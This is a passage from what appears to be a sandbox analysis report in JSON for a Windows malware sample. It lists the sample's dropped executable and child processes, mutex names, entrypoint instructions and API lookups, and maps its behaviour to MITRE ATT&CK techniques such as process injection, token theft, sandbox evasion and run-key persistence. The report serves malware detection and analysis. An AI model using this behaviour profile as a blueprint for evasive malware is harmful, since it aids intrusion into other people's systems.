Windows", "runtime_process": "a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe (PID: 2776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002776", "name": "a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe", "normalized_path": "C:\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe", "sha256": "a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5"}, {"uid": "00000000-00004576", "parentuid": "00000000-00002776", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe *", "sha256": "6f7c54146e31db911dc9e48adec7acc54517c949fa016323a60160224a120638"}, {"uid": "00000000-00003216", "parentuid": "00000000-00004576", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZVUSTG", "sha256": "6f7c54146e31db911dc9e48adec7acc54517c949fa016323a60160224a120638"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002776)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter _set_invalid_parameter_handler (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ___lc_codepage_func (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003216)\n \"085cda53603755dc.exe\" called 